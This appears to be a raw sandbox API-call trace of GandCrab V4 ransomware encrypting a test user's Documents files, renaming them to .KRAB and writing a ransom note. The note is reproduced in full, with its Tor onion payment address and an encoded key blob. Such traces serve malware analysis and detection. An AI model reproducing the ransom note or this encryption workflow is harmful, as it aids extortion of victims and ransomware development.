flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.732] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x57000, lpOverlapped=0x0) returned 1 [0088.806] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffa9000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.806] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x57000, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x57000, lpOverlapped=0x0) returned 1 [0088.807] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.807] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.811] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.814] CloseHandle (hObject=0x434) returned 1 [0088.814] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.814] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\database1.accdb"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\database1.accdb.krab")) returned 1 [0088.815] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.815] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.815] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0088.815] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0088.815] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini" [0088.815] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.816] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini.KRAB") returned 48 [0088.816] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned 43 [0088.816] lstrlenW (lpString=".ini") returned 4 [0088.816] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.816] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0088.816] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned 43 [0088.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned 43 [0088.817] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0088.817] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.817] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.817] lstrcmpW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2=".") returned 1 [0088.817] lstrcmpW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="..") returned 1 [0088.817] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="dIO-dk87R2 8K-9UbP.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx" [0088.817] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.818] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx.KRAB") returned 60 [0088.818] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx") returned 55 [0088.818] lstrlenW (lpString=".docx") returned 5 [0088.818] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.818] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0088.818] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.818] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx") returned 55 [0088.819] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx") returned 55 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="desktop.ini") returned 1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="autorun.inf") returned 1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="ntuser.dat") returned -1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="iconcache.db") returned -1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="bootsect.bak") returned 1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="boot.ini") returned 1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="ntuser.dat.log") returned -1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="thumbs.db") returned -1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="ntldr") returned -1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="NTDETECT.COM") returned -1 [0088.819] lstrcmpiW (lpString1="dIO-dk87R2 8K-9UbP.docx", lpString2="Bootfont.bin") returned 1 [0088.819] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.819] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0088.821] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.822] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.822] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.822] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.822] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0088.822] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.822] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0088.824] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.824] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.825] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.825] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.825] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.825] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.825] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011018) returned 1 [0088.827] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0088.827] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.827] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.828] GetLastError () returned 0x0 [0088.828] CryptDestroyKey (hKey=0x10234f8) returned 1 [0088.828] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0088.828] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010820) returned 1 [0088.829] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0088.829] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.829] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.830] GetLastError () returned 0x0 [0088.830] CryptDestroyKey (hKey=0x10234f8) returned 1 [0088.830] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0088.830] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\dio-dk87r2 8k-9ubp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.830] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.831] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.831] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x150d2, lpOverlapped=0x0) returned 1 [0088.847] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffeaf2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.847] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x150d2, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x150d2, lpOverlapped=0x0) returned 1 [0088.847] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.847] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.851] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.852] CloseHandle (hObject=0x434) returned 1 [0088.852] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.852] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\dio-dk87r2 8k-9ubp.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\dIO-dk87R2 8K-9UbP.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\dio-dk87r2 8k-9ubp.docx.krab")) returned 1 [0088.853] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.854] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.854] lstrcmpW (lpString1="ErAdO5.pptx", lpString2=".") returned 1 [0088.854] lstrcmpW (lpString1="ErAdO5.pptx", lpString2="..") returned 1 [0088.854] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="ErAdO5.pptx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx" [0088.854] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.854] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx.KRAB") returned 48 [0088.854] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx") returned 43 [0088.854] lstrlenW (lpString=".pptx") returned 5 [0088.854] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.855] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pptx ") returned 6 [0088.855] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.855] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx") returned 43 [0088.855] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx") returned 43 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="desktop.ini") returned 1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="autorun.inf") returned 1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="ntuser.dat") returned -1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="iconcache.db") returned -1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="bootsect.bak") returned 1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="boot.ini") returned 1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="ntuser.dat.log") returned -1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="thumbs.db") returned -1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="KRAB-DECRYPT.html") returned -1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.855] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.856] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="ntldr") returned -1 [0088.856] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="NTDETECT.COM") returned -1 [0088.856] lstrcmpiW (lpString1="ErAdO5.pptx", lpString2="Bootfont.bin") returned 1 [0088.856] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0088.856] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010ce8) returned 1 [0088.858] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.858] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.858] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.859] CryptGenRandom (in: hProv=0x1010ce8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0088.859] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0088.859] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.859] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10111b0) returned 1 [0088.861] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0088.861] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0088.861] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0088.861] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0088.861] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0088.862] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.862] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0088.863] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023378) returned 1 [0088.863] CryptGetKeyParam (in: hKey=0x1023378, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.863] CryptEncrypt (in: hKey=0x1023378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.864] GetLastError () returned 0x0 [0088.864] CryptDestroyKey (hKey=0x1023378) returned 1 [0088.864] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.864] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0088.865] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10230f8) returned 1 [0088.866] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0088.866] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0088.866] GetLastError () returned 0x0 [0088.866] CryptDestroyKey (hKey=0x10230f8) returned 1 [0088.866] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0088.866] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\erado5.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.867] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0088.867] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0088.867] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x207a, lpOverlapped=0x0) returned 1 [0088.880] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffdf86, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.880] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x207a, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x207a, lpOverlapped=0x0) returned 1 [0088.880] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0088.880] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.884] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.884] CloseHandle (hObject=0x434) returned 1 [0088.885] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.885] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\erado5.pptx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\ErAdO5.pptx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\erado5.pptx.krab")) returned 1 [0088.886] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.886] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0088.886] lstrcmpW (lpString1="fEXHt9X87hw5FTqPcrNK", lpString2=".") returned 1 [0088.886] lstrcmpW (lpString1="fEXHt9X87hw5FTqPcrNK", lpString2="..") returned 1 [0088.886] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="fEXHt9X87hw5FTqPcrNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK" [0088.886] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\" [0088.886] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0088.887] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0088.887] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0088.887] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0088.887] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0088.887] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.887] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0088.887] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\\\KRAB-DECRYPT.txt") returned 70 [0088.887] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.888] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6Z